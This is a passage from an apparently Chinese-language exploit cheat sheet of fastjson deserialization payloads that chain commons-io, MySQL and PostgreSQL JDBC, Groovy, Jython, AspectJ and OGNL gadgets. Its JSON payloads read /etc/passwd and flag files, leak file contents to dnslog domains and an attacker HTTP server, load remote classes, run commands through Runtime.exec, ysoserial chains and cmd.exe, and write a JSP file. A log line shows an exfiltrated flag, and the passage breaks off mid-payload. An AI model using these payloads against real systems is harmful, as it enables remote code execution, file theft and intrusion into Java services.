| "charsetName": "UTF-8", 667 | "bytes": [ 668 | 60,101 669 | ] 670 | } 671 | ] 672 | }, 673 | "address": { 674 | "$ref": "$.abc.BOM" 675 | } 676 | } 677 | ``` 678 | 679 | ```xml 680 | 681 | commons-io 682 | commons-io 683 | 2.1 684 | 685 | ``` 686 | 687 | 文件内容为 test,对应ascii[116,101,115,116] 688 | ```json 689 | # 逐位填入bytes,可利用二分法爆破 690 | # 正确则返回base64结果 691 | {"abc":{"bOM":{"bytes":"dGVzdA==","charsetName":"UTF-8"},"bOMCharsetName":"UTF-8"},"address":{"$ref":"$.abc.bOM"}} 692 | # 错误 693 | {"abc":{}} 694 | ``` 695 | 696 | 697 | 698 | ### 利用类型不一致报错 699 | ```json 700 | { 701 | "abc": { 702 | "@type": "java.lang.AutoCloseable", 703 | "@type": "org.apache.commons.io.input.BOMInputStream", 704 | "delegate": { 705 | "@type": "org.apache.commons.io.input.ReaderInputStream", 706 | "reader": { 707 | "@type": "jdk.nashorn.api.scripting.URLReader", 708 | "url": "file:///etc/passwd" 709 | }, 710 | "charsetName": "UTF-8", 711 | "bufferSize": 1024 712 | }, 713 | "boms": [ 714 | { 715 | "charsetName": "UTF-8", 716 | "bytes": [ 717 | 60,101 718 | ] 719 | } 720 | ] 721 | }, 722 | "address": { 723 | "@type": "java.lang.AutoCloseable", 724 | "@type": "org.apache.commons.io.input.CharSequenceReader", 725 | "charSequence": { 726 | "@type": "java.lang.String"{"$ref":"$.abc.BOM[0]"}, 727 | "start": 0, 728 | "end": 0 729 | } 730 | } 731 | } 732 | ``` 733 | 734 | 735 | ### 无回显 对比正确时请求dnslog 736 | https://tyskill.github.io/posts/fastjson%E6%97%A0%E5%9B%9E%E6%98%BE%E8%AF%BB%E6%96%87%E4%BB%B6/ 737 | ```json 738 | { 739 | "abc":{"@type": "java.lang.AutoCloseable", 740 | "@type": "org.apache.commons.io.input.BOMInputStream", 741 | "delegate": { 742 | "@type": "org.apache.commons.io.input.ReaderInputStream", 743 | "reader": { 744 | "@type": "jdk.nashorn.api.scripting.URLReader", 745 | "url": "file:///etc/passwd" 746 | }, 747 | "charsetName": "UTF-8", 748 | "bufferSize": 1024 749 | },"boms": [ 750 | { 751 | "@type": "org.apache.commons.io.ByteOrderMark", 752 | "charsetName": "UTF-8", 753 | "bytes": [116,101,115,116] 754 | } 755 | ] 756 | }, 757 | "address": { 758 | "@type": "java.lang.AutoCloseable", 759 | "@type": "org.apache.commons.io.input.BOMInputStream", 760 | "delegate": { 761 | "@type": "org.apache.commons.io.input.ReaderInputStream", 762 | "reader": { 763 | "@type": "jdk.nashorn.api.scripting.URLReader", 764 | "url": "http://fj.ppp.dnslog.pw" 765 | }, 766 | "charsetName": "UTF-8", 767 | "bufferSize": 1024 768 | }, 769 | "boms": [{"$ref":"$.abc.BOM[0]"}] 770 | }, 771 | "xxx":{"$ref":"$.address.BOM[0]"} 772 | } 773 | ``` 774 | 775 | ### 无回显 对比不正确时请求dnslog 很麻烦 776 | ```json 777 | { 778 | "abc":{"@type": "java.lang.AutoCloseable", 779 | "@type": "org.apache.commons.io.input.BOMInputStream", 780 | "delegate": {"@type": "org.apache.commons.io.input.ReaderInputStream", 781 | "reader": { "@type": "jdk.nashorn.api.scripting.URLReader", 782 | "url": "file:///etc/passwd" 783 | }, 784 | "charsetName": "UTF-8", 785 | "bufferSize": 1024 786 | },"boms": [ 787 | { 788 | "@type": "org.apache.commons.io.ByteOrderMark", 789 | "charsetName": "UTF-8", 790 | "bytes": [ 791 | 48, 792 | ] 793 | } 794 | ] 795 | }, 796 | "address" : { 797 | "@type": "java.lang.AutoCloseable", 798 | "@type":"org.apache.commons.io.input.CharSequenceReader", 799 | "charSequence": { 800 | "@type": "java.lang.String"{"$ref":"$.abc.BOM[0]" 801 | }, 802 | "start": 0, 803 | "end": 0 804 | }, 805 | "xxx":{{"@type":"java.net.Inet4Address","val":"cnm.awm6.hyuga.icu"}:"xx"} 806 | } 807 | 808 | ``` 809 | 810 | ## Mysql connect RCE 811 | ### Fake Server 812 | > https://github.com/fnmsd/MySQL_Fake_Server 813 | 814 | ```xml 815 | 816 | mysql 817 | mysql-connector-java 818 | 5.1.11 819 | 820 | ``` 821 | 822 | #### [5.1.11, 5.1.48] 823 | ```json 824 | { 825 | "@type": "java.lang.AutoCloseable", 826 | "@type": "com.mysql.jdbc.JDBC4Connection", 827 | "hostToConnectTo": "127.0.0.1", 828 | "portToConnectTo": 3306, 829 | "info": { 830 | "user": "fileread_/tmp/flag", 831 | "password": "pass", 832 | "maxAllowedPacket": "655360", 833 | "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", 834 | "autoDeserialize": "true", 835 | "NUM_HOSTS": "1" 836 | }, 837 | "databaseToConnectTo": "dbname", 838 | "url": "" 839 | } 840 | ``` 841 | 842 | #### [6.0.2, 6.0.6] 843 | ```json 844 | { 845 | "@type": "java.lang.AutoCloseable", 846 | "@type": "com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection", 847 | "proxy": { 848 | "connectionString": { 849 | "url": "jdbc:mysql://localhost:3306/test?allowLoadLocalInfile=true&autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections5_/System/Applications/Calculator.app/Contents/MacOS/Calculator" 850 | } 851 | } 852 | } 853 | ``` 854 | 855 | #### [8.0.7-dmr, 8.0.19] 856 | ```json 857 | { 858 | "@type": "java.lang.AutoCloseable", 859 | "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection", 860 | "proxy": { 861 | "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy", 862 | "connectionUrl": { 863 | "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl", 864 | "masters": [ 865 | { 866 | "host": "127.0.0.1" 867 | } 868 | ], 869 | "slaves": [], 870 | "properties": { 871 | "host": "127.0.0.1", 872 | "user": "yso_CommonsCollections5_open -a Calculator.app", 873 | "dbname": "dbname", 874 | "password": "pass", 875 | "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor", 876 | "autoDeserialize": "true", 877 | "allowLoadLocalInfile": "true" 878 | } 879 | } 880 | } 881 | } 882 | ``` 883 | 884 | # fastjson <= 1.2.80 反序列化代码执行 885 | ## groovy RCE 886 | ```xml 887 | 888 | org.codehaus.groovy 889 | groovy 890 | 3.0.9 891 | 892 | ``` 893 | 894 | 新建项目 895 | src/main/java/org/example/GroovyPoc.java 896 | ```java 897 | @GroovyASTTransformation(phase = CompilePhase.CONVERSION) 898 | public class GroovyPoc implements ASTTransformation { 899 | public GroovyPoc(){ 900 | try{ 901 | Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator"); 902 | }catch (Exception ex){ 903 | 904 | } 905 | } 906 | 907 | @Override 908 | public void visit(ASTNode[] astNodes, SourceUnit sourceUnit) { 909 | 910 | } 911 | } 912 | ``` 913 | src/main/resources/META-INF/services/org.codehaus.groovy.transform.ASTTransformation 914 | 写入恶意类 915 | ``` 916 | org.example.GroovyPoc 917 | ``` 918 | 919 | ``` 920 | mvn install 921 | 在classes目录开启http服务 922 | ``` 923 | 924 | poc1 925 | ```json 926 | { 927 | "@type":"java.lang.Exception", 928 | "@type":"org.codehaus.groovy.control.CompilationFailedException", 929 | "unit":{} 930 | } 931 | ``` 932 | poc2 933 | ```json 934 | { 935 | "@type":"org.codehaus.groovy.control.ProcessingUnit", 936 | "@type":"org.codehaus.groovy.tools.javac.JavaStubCompilationUnit", 937 | "config":{ 938 | "@type":"org.codehaus.groovy.control.CompilerConfiguration", 939 | "classpathList":"http://192.168.16.132:1234/" 940 | } 941 | } 942 | ``` 943 | 944 | ## jython 945 | [参考猎鹰](https://mp.weixin.qq.com/s/m2U4zNkLCJvO3l1jChzeFw) 946 | ```xml 947 | 948 | 949 | org.python 950 | jython 951 | 2.7.0 952 | 953 | ``` 954 | ### psql 955 | https://mp.weixin.qq.com/s/m2U4zNkLCJvO3l1jChzeFw 956 | ```xml 957 | 958 | org.postgresql 959 | postgresql 960 | 42.3.1 961 | 962 | ``` 963 | 964 | ```json 965 | { 966 | "a":{ 967 | "@type":"java.lang.Exception", 968 | "@type":"org.python.antlr.ParseException", 969 | }, 970 | "b":{ 971 | "@type":"java.lang.Class", 972 | "val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"org.python.antlr.ParseException", 973 | "type":{}}} 974 | }, 975 | "c":{ 976 | "@type":"org.python.core.PyObject", 977 | "@type":"com.ziclix.python.sql.PyConnection", 978 | "connection":{ 979 | "@type":"org.postgresql.jdbc.PgConnection", 980 | "hostSpecs":[{"host":"127.0.0.1","port":2333}], 981 | "user":"user", 982 | "database":"test", 983 | "info":{ 984 | "socketFactory":"org.springframework.context.support.ClassPathXmlApplicationContext", 985 | "socketFactoryArg":"http://127.0.0.1:1234/exp.xml" 986 | }, 987 | "url":"" 988 | } 989 | } 990 | } 991 | ``` 992 | 993 | 任意spring bean xml exp,其他payload可[参考](https://gv7.me/articles/2021/some-extensions-of-spring-bean-rce-under-weblogic/) 994 | exp.xml - jndi 995 | ```xml 996 | 997 | 1001 | 1002 | 1003 | 1004 | 1005 | ``` 1006 | 1007 | exp.xml - cmd 1008 | ```xml 1009 | 1010 | 1014 | 1015 | 1016 | 1017 | cmd.exe 1018 | /c 1019 | 1020 | 1021 | 1022 | 1023 | 1024 | 1025 | ``` 1026 | 1027 | ### mysql 1028 | ```xml 1029 | 1030 | mysql 1031 | mysql-connector-java 1032 | 5.1.11 1033 | 1034 | ``` 1035 | 1036 | #### [5.1.11, 5.1.48] 1037 | ```json 1038 | { 1039 | "a":{ 1040 | "@type":"java.lang.Exception", 1041 | "@type":"org.python.antlr.ParseException", 1042 | }, 1043 | "b":{ 1044 | "@type":"java.lang.Class", 1045 | "val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"org.python.antlr.ParseException", 1046 | "type":{}}} 1047 | }, 1048 | "c":{ 1049 | "@type":"org.python.core.PyObject", 1050 | "@type":"com.ziclix.python.sql.PyConnection", 1051 | "connection":{ 1052 | "@type": "com.mysql.jdbc.JDBC4Connection", 1053 | "hostToConnectTo": "127.0.0.1", 1054 | "portToConnectTo": 3306, 1055 | "info": { 1056 | "user": "fileread_/tmp/flag", 1057 | "password": "pass", 1058 | "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", 1059 | "autoDeserialize": "true", 1060 | "NUM_HOSTS": "1", 1061 | "maxAllowedPacket":"655360" 1062 | }, 1063 | "databaseToConnectTo": "dbname", 1064 | "url": "" 1065 | } 1066 | } 1067 | } 1068 | 1069 | ``` 1070 | 1071 | #### [6.0.2, 6.0.6] 1072 | ```json 1073 | { 1074 | "a":{ 1075 | "@type":"java.lang.Exception", 1076 | "@type":"org.python.antlr.ParseException", 1077 | }, 1078 | "b":{ 1079 | "@type":"java.lang.Class", 1080 | "val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"org.python.antlr.ParseException", 1081 | "type":{}}} 1082 | }, 1083 | "c":{ 1084 | "@type":"org.python.core.PyObject", 1085 | "@type":"com.ziclix.python.sql.PyConnection", 1086 | "connection":{ 1087 | "@type":"com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection", 1088 | "proxy": { 1089 | "connectionString": { 1090 | "url": "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=fileread_/tmp/flag" 1091 | } 1092 | } 1093 | } 1094 | } 1095 | } 1096 | ``` 1097 | 1098 | #### [8.0.7-dmr, 8.0.19] 1099 | ```json 1100 | { 1101 | "a":{ 1102 | "@type":"java.lang.Exception", 1103 | "@type":"org.python.antlr.ParseException", 1104 | }, 1105 | "b":{ 1106 | "@type":"java.lang.Class", 1107 | "val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"org.python.antlr.ParseException", 1108 | "type":{}}} 1109 | }, 1110 | "c":{ 1111 | "@type":"org.python.core.PyObject", 1112 | "@type":"com.ziclix.python.sql.PyConnection", 1113 | "connection":{ 1114 | "@type":"com.mysql.cj.jdbc.ha.ReplicationMySQLConnection", 1115 | "proxy":{ 1116 | "@type":"com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy", 1117 | "connectionUrl":{ 1118 | "@type":"com.mysql.cj.conf.url.ReplicationConnectionUrl", 1119 | "masters":[{"host":"127.0.0.1"}], 1120 | "slaves":[], 1121 | "properties":{ 1122 | "host":"127.0.0.1", 1123 | "port":"3306", 1124 | "connectionAttributes":"t:cb32", 1125 | "user":"fileread_/tmp/flag", 1126 | "dname":"dname", 1127 | "password":"password", 1128 | "queryInterceptors":"com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor", 1129 | "autoDeserialize":"true", 1130 | "allowLoadLocalInfile":"true" 1131 | } 1132 | } 1133 | } 1134 | } 1135 | } 1136 | } 1137 | ``` 1138 | 1139 | ## AspectJ Tools (Compiler)文件读取 1140 | ```xml 1141 | 1142 | org.aspectj 1143 | aspectjtools 1144 | 1.9.8 1145 | 1146 | ``` 1147 | 1.7.0<=version<=1.9.9 1148 | 1149 | poc需要分三次打,web项目可用 1150 | poc1 1151 | ```json 1152 | { 1153 | "@type":"java.lang.Exception", 1154 | "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException" 1155 | } 1156 | ``` 1157 | poc2 1158 | ```json 1159 | { 1160 | "@type":"java.lang.Class", 1161 | "val":{ 1162 | "@type":"java.lang.String"{ 1163 | "@type":"java.util.Locale", 1164 | "val":{ 1165 | "@type":"com.alibaba.fastjson.JSONObject",{ 1166 | "@type":"java.lang.String" 1167 | "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException", 1168 | "newAnnotationProcessorUnits":[{}] 1169 | } 1170 | } 1171 | } 1172 | ``` 1173 | 1174 | 根据利用环境有多种poc3 1175 | ### 有回显 1176 | ```json 1177 | { 1178 | "x":{ 1179 | "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit", 1180 | "@type":"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit", 1181 | "fileName":"/etc/passwd" 1182 | } 1183 | } 1184 | ``` 1185 | ### 报错回显 1186 | ```json 1187 | { 1188 | "@type": "java.lang.Character" { 1189 | "C": { 1190 | "x": { 1191 | "@type": "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit", 1192 | "@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit", 1193 | "fileName": "/etc/passwd" 1194 | } 1195 | } 1196 | } 1197 | } 1198 | ``` 1199 | 1200 | ### dnslog 1201 | 受限于字符,带出失败 1202 | ```json 1203 | { 1204 | "@type":"java.net.Inet4Address", 1205 | "val":{ 1206 | "@type":"java.lang.String"{ 1207 | "@type":"java.util.Locale", 1208 | "val":{ 1209 | "@type":"com.alibaba.fastjson.JSONObject",{ 1210 | "@type":"java.lang.String" 1211 | "@type":"java.util.Locale", 1212 | "country":"fj.ppp.dnslog.pw", 1213 | "language":{ 1214 | "@type":"java.lang.String"{ 1215 | "x":{ 1216 | "@type": "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit", 1217 | "@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit", 1218 | "fileName": "/etc/passwd" 1219 | } 1220 | } 1221 | } 1222 | } 1223 | } 1224 | } 1225 | } 1226 | } 1227 | ``` 1228 | 1229 | ## AspectJ + cc + ognl http带出文件 1230 | ```xml 1231 | 1232 | ognl 1233 | ognl 1234 | 3.2.21 1235 | 1236 | 1237 | commons-io 1238 | commons-io 1239 | 2.2 1240 | 1241 | 1242 | 1243 | org.aspectj 1244 | aspectjtools 1245 | 1.9.8 1246 | 1247 | ``` 1248 | 1249 | poc1 1250 | ```json 1251 | [{ 1252 | "@type": "java.lang.Exception", 1253 | "@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException" 1254 | }, 1255 | { 1256 | "@type": "java.lang.Class", 1257 | "val": { 1258 | "@type": "java.lang.String" { 1259 | "@type": "java.util.Locale", 1260 | "val": { 1261 | "@type": "com.alibaba.fastjson.JSONObject", 1262 | { 1263 | "@type": "java.lang.String" 1264 | "@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException", 1265 | "newAnnotationProcessorUnits": [{}] 1266 | } 1267 | } 1268 | }, 1269 | { 1270 | "x": { 1271 | "@type": "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit", 1272 | "@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit", 1273 | "fileName": "aaa" 1274 | } 1275 | }] 1276 | ``` 1277 | 1278 | poc2 1279 | ```json 1280 | { 1281 | "su14": { 1282 | "@type": "java.lang.Exception", 1283 | "@type": "ognl.OgnlException" 1284 | }, 1285 | "su15": { 1286 | "@type": "java.lang.Class", 1287 | "val": { 1288 | "@type": "com.alibaba.fastjson.JSONObject", 1289 | { 1290 | "@type": "java.lang.String" 1291 | "@type": "ognl.OgnlException", 1292 | "_evaluation": "" 1293 | } 1294 | }, 1295 | "su16": { 1296 | "@type": "ognl.Evaluation", 1297 | "node": { 1298 | "@type": "ognl.ASTMethod", 1299 | "p": { 1300 | "@type": "ognl.OgnlParser", 1301 | "stream": { 1302 | "@type": "org.apache.commons.io.input.BOMInputStream", 1303 | "delegate": { 1304 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1305 | "reader": { 1306 | "@type": "jdk.nashorn.api.scripting.URLReader", 1307 | "url": { 1308 | "@type": "java.lang.String" { 1309 | "@type": "java.util.Locale", 1310 | "val": { 1311 | "@type": "com.alibaba.fastjson.JSONObject", 1312 | { 1313 | "@type": "java.lang.String" 1314 | "@type": "java.util.Locale", 1315 | "language": "http://192.168.66.136:1234/", 1316 | "country": { 1317 | "@type": "java.lang.String" [{ 1318 | "@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit", 1319 | "fileName": "tmp" 1320 | }] 1321 | 1322 | } 1323 | } 1324 | }, 1325 | "charsetName": "UTF-8", 1326 | "bufferSize": 1024 1327 | }, 1328 | "boms": [{ 1329 | "@type": "org.apache.commons.io.ByteOrderMark", 1330 | "charsetName": "UTF-8", 1331 | "bytes": [ 1332 | 0 1333 | ] 1334 | }] 1335 | } 1336 | } 1337 | } 1338 | }, 1339 | "su17": { 1340 | "$ref": "$.su16.node.p.stream" 1341 | }, 1342 | "su18": { 1343 | "$ref": "$.su17.bOM.bytes" 1344 | } 1345 | } 1346 | ``` 1347 | 带出文件 1348 | ``` 1349 | ::ffff:192.168.66.136 - - [17/Oct/2022 10:37:49] "GET /_[{"CONTENTS":"FLAG{THIS IS FLAG}","FILENAME":"TMP","MAINTYPENAME":"TMP"}] HTTP/1.1" 400 - 1350 | ``` 1351 | 1352 | ## ognl + io读文件 1353 | ### 利用报错回显 jdk8 1354 | 类似1.2.68,但实际测试起来效果不太理想 1355 | ```xml 1356 | 1357 | ognl 1358 | ognl 1359 | 3.2.21 1360 | 1361 | 1362 | commons-io 1363 | commons-io 1364 | 2.2 1365 | 1366 | ``` 1367 | 1368 | ```json 1369 | { 1370 | "su14": { 1371 | "@type": "java.lang.Exception", 1372 | "@type": "ognl.OgnlException" 1373 | }, 1374 | "su15": { 1375 | "@type": "java.lang.Class", 1376 | "val": { 1377 | "@type": "com.alibaba.fastjson.JSONObject", 1378 | { 1379 | "@type": "java.lang.String" 1380 | "@type": "ognl.OgnlException", 1381 | "_evaluation": "" 1382 | } 1383 | }, 1384 | "su16": { 1385 | "@type": "ognl.Evaluation", 1386 | "node": { 1387 | "@type": "ognl.ASTMethod", 1388 | "p": { 1389 | "@type": "ognl.OgnlParser", 1390 | "stream": { 1391 | "@type": "org.apache.commons.io.input.BOMInputStream", 1392 | "delegate": { 1393 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1394 | "reader": { 1395 | "@type": "jdk.nashorn.api.scripting.URLReader", 1396 | "url": "file://tmp" 1397 | }, 1398 | "charsetName": "UTF-8", 1399 | "bufferSize": 1024 1400 | }, 1401 | "boms": [{ 1402 | "@type": "org.apache.commons.io.ByteOrderMark", 1403 | "charsetName": "UTF-8", 1404 | "bytes": [ 1405 | 116,101,115,116 1406 | ] 1407 | }] 1408 | } 1409 | } 1410 | } 1411 | }, 1412 | "su17": { 1413 | "$ref": "$.su16.node.p.stream" 1414 | }, 1415 | "su18": { 1416 | "$ref": "$.su17.bOM.bytes" 1417 | } 1418 | } 1419 | ``` 1420 | 1421 | ### 利用报错布尔 1422 | ```json 1423 | [{"su15":{"@type":"java.lang.Exception","@type":"ognl.OgnlException",}},{"su16":{"@type":"java.lang.Class","val":{ "@type":"com.alibaba.fastjson.JSONObject",{ "@type":"java.lang.String" "@type":"ognl.OgnlException", "_evaluation":""}}}, 1424 | {"su17":{ "@type": "ognl.Evaluation", "node": { "@type": "ognl.ASTMethod", "p": { "@type": "ognl.OgnlParser", "stream": 1425 | { 1426 | "@type": "org.apache.commons.io.input.BOMInputStream", 1427 | "delegate": { 1428 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1429 | "reader": { 1430 | "@type": "jdk.nashorn.api.scripting.URLReader", 1431 | "url": "file://tmp" 1432 | }, 1433 | "charsetName": "UTF-8", 1434 | "bufferSize": 1024 1435 | },"boms": [{"@type": "org.apache.commons.io.ByteOrderMark", "charsetName": "UTF-8", "bytes": [ 1436 | 116,101,115,116]}] 1437 | }}}}},{"su18" : {"$ref":"$[2].su17.node.p.stream"}},{"su19":{ 1438 | "$ref":"$[3].su18.bOM.bytes"}},{"su20":{ "@type": "ognl.Evaluation", "node": { "@type": "ognl.ASTMethod", "p": { "@type": "ognl.OgnlParser", "stream":{ "@type": "org.apache.commons.io.input.BOMInputStream", "delegate": { "@type": "org.apache.commons.io.input.ReaderInputStream", "reader":{"@type":"org.apache.commons.io.input.CharSequenceReader", 1439 | "charSequence": {"@type": "java.lang.String"{"$ref":"$[4].su19"},"start": 0,"end": 0}, "charsetName": "UTF-8", "bufferSize": 1024},"boms": [{"@type": "org.apache.commons.io.ByteOrderMark", "charsetName": "UTF-8", "bytes": [1]}]}}}}},{"su21" : {"$ref":"$[5].su20.node.p.stream"}}] 1440 | ``` 1441 | 1442 | ### http报错回显 1443 | ```json 1444 | [{"su15":{"@type":"java.lang.Exception","@type":"ognl.OgnlException",}},{"su16":{"@type":"java.lang.Class","val":{ "@type":"com.alibaba.fastjson.JSONObject",{ "@type":"java.lang.String" "@type":"ognl.OgnlException", "_evaluation":""}}}, 1445 | {"su17":{ "@type": "ognl.Evaluation", "node": { "@type": "ognl.ASTMethod", "p": { "@type": "ognl.OgnlParser", "stream": 1446 | { 1447 | "@type": "org.apache.commons.io.input.BOMInputStream", 1448 | "delegate": { 1449 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1450 | "reader": { 1451 | "@type": "jdk.nashorn.api.scripting.URLReader", 1452 | "url": "file://tmp" 1453 | }, 1454 | "charsetName": "UTF-8", 1455 | "bufferSize": 1024 1456 | },"boms": [{"@type": "org.apache.commons.io.ByteOrderMark", "charsetName": "UTF-8", "bytes": [ 1457 | 98]}] 1458 | }}}}},{"su18" : {"$ref":"$[2].su17.node.p.stream"}},{"su19":{ 1459 | "$ref":"$[3].su18.bOM.bytes"}},{"su22":{ "@type": "ognl.Evaluation", "node": { "@type": "ognl.ASTMethod", "p": { "@type": "ognl.OgnlParser", "stream":{ "@type": "org.apache.commons.io.input.BOMInputStream", "delegate": { "@type": "org.apache.commons.io.input.ReaderInputStream", "reader":{"@type":"jdk.nashorn.api.scripting.URLReader","url":{"@type":"java.lang.String"{"@type":"java.net.URL","val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type": "java.lang.String""@type":"java.util.Locale","language":"http://192.168.66.136:1234/","country":{"@type":"java.lang.String"{"$ref":"115"}}}}}, "charsetName": "UTF-8", "bufferSize": 1024},"boms": [{"@type": "org.apache.commons.io.ByteOrderMark", "charsetName": "UTF-8", "bytes": [1]}]}}}}},{"su23" : {"$ref":"$[5].su22.node.p.stream"}},{"su20":{ "@type": "ognl.Evaluation", "node": { "@type": "ognl.ASTMethod", "p": { "@type": "ognl.OgnlParser", "stream":{ "@type": "org.apache.commons.io.input.BOMInputStream", "delegate": { "@type": "org.apache.commons.io.input.ReaderInputStream", "reader":{"@type":"org.apache.commons.io.input.CharSequenceReader", 1460 | "charSequence": {"@type": "java.lang.String"{"$ref":"$[4].su19"},"start": 0,"end": 0}, "charsetName": "UTF-8", "bufferSize": 1024},"boms": [{"@type": "org.apache.commons.io.ByteOrderMark", "charsetName": "UTF-8", "bytes": [1]}]}}}}},{"su21" : {"$ref":"$[7].su20.node.p.stream"}}] 1461 | ``` 1462 | 1463 | ## ognl + io 写文件(链子有问题,还要调一下) 1464 | ### cc低版本 2.0 -2.6 1465 | ```xml 1466 | 1467 | ognl 1468 | ognl 1469 | 3.2.21 1470 | 1471 | 1472 | commons-io 1473 | commons-io 1474 | 2.2 1475 | 1476 | ``` 1477 | 1478 | ```json 1479 | { 1480 | "su14": { 1481 | "@type": "java.lang.Exception", 1482 | "@type": "ognl.OgnlException" 1483 | }, 1484 | "su15": { 1485 | "@type": "java.lang.Class", 1486 | "val": { 1487 | "@type": "com.alibaba.fastjson.JSONObject", 1488 | { 1489 | "@type": "java.lang.String" 1490 | "@type": "ognl.OgnlException", 1491 | "_evaluation": "" 1492 | } 1493 | }, 1494 | "su16": { 1495 | "@type": "ognl.Evaluation", 1496 | "node": { 1497 | "@type": "ognl.ASTMethod", 1498 | "p": { 1499 | "@type": "ognl.OgnlParser", 1500 | "stream": { 1501 | "@type": "org.apache.commons.io.input.BOMInputStream", 1502 | "delegate": { 1503 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1504 | "reader": { 1505 | "@type":"org.apache.commons.io.input.XmlStreamReader", 1506 | "is":{ 1507 | "@type":"org.apache.commons.io.input.TeeInputStream", 1508 | "input":{ 1509 | "@type":"org.apache.commons.io.input.ReaderInputStream", 1510 | "reader":{ 1511 | "@type":"org.apache.commons.io.input.CharSequenceReader", 1512 | "charSequence":{"@type":"java.lang.String""test8200个a" 1513 | }, 1514 | "charsetName":"UTF-8", 1515 | "bufferSize":1024 1516 | }, 1517 | "branch":{ 1518 | "@type":"org.apache.commons.io.output.WriterOutputStream", 1519 | "writer":{ 1520 | "@type":"org.apache.commons.io.output.FileWriterWithEncoding", 1521 | "file":"1.jsp", 1522 | "encoding":"UTF-8", 1523 | "append": false 1524 | }, 1525 | "charsetName":"UTF-8", 1526 | "bufferSize": 1024, 1527 | "writeImmediately": true 1528 | }, 1529 | "closeBranch": true 1530 | }, 1531 | "httpContentType":"text/xml", 1532 | "lenient":false, 1533 | "defaultEncoding":"UTF-8" 1534 | }, 1535 | "charsetName": "UTF-8", 1536 | "bufferSize": 1024 1537 | }, 1538 | "boms": [{ 1539 | "@type": "org.apache.commons.io.ByteOrderMark", 1540 | "charsetName": "UTF-8", 1541 | "bytes": [ 1542 | 36,82 1543 | ] 1544 | }] 1545 | } 1546 | } 1547 | } 1548 | }, 1549 | "su17": { 1550 | "@type": "ognl.Evaluation", 1551 | "node": { 1552 | "@type": "ognl.ASTMethod", 1553 | "p": { 1554 | "@type": "ognl.OgnlParser", 1555 | "stream": { 1556 | "@type": "org.apache.commons.io.input.BOMInputStream", 1557 | "delegate": { 1558 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1559 | "reader": { 1560 | "@type":"org.apache.commons.io.input.XmlStreamReader", 1561 | "is":{ 1562 | "@type":"org.apache.commons.io.input.TeeInputStream", 1563 | "input":{"$ref": "$.su16.node.p.stream.delegate.reader.is.input"}, 1564 | "branch":{"$ref": "$.su16.node.p.stream.delegate.reader.is.branch"}, 1565 | "closeBranch": true 1566 | }, 1567 | "httpContentType":"text/xml", 1568 | "lenient":false, 1569 | "defaultEncoding":"UTF-8" 1570 | }, 1571 | "charsetName": "UTF-8", 1572 | "bufferSize": 1024 1573 | }, 1574 | "boms": [{ 1575 | "@type": "org.apache.commons.io.ByteOrderMark", 1576 | "charsetName": "UTF-8", 1577 | "bytes": [ 1578 | 36,82 1579 | ] 1580 | }] 1581 | } 1582 | } 1583 | } 1584 | }, 1585 | "su18": { 1586 | "@type": "ognl.Evaluation", 1587 | "node": { 1588 | "@type": "ognl.ASTMethod", 1589 | "p": { 1590 | "@type": "ognl.OgnlParser", 1591 | "stream": { 1592 | "@type": "org.apache.commons.io.input.BOMInputStream", 1593 | "delegate": { 1594 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1595 | "reader": { 1596 | "@type":"org.apache.commons.io.input.XmlStreamReader", 1597 | "is":{ 1598 | "@type":"org.apache.commons.io.input.TeeInputStream", 1599 | "input":{"$ref": "$.su16.node.p.stream.delegate.reader.is.input"}, 1600 | "branch":{"$ref": "$.su16.node.p.stream.delegate.reader.is.branch"}, 1601 | "closeBranch": true 1602 | }, 1603 | "httpContentType":"text/xml", 1604 | "lenient":false, 1605 | "defaultEncoding":"UTF-8" 1606 | }, 1607 | "charsetName": "UTF-8", 1608 | "bufferSize": 1024 1609 | }, 1610 | "boms": [{ 1611 | 